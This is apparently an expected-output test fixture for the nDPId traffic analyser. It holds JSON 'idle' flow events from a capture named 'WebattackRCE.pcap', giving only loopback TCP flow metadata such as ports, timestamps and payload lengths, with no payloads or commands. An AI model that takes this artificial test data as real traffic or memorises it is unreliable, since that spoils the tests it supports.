+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
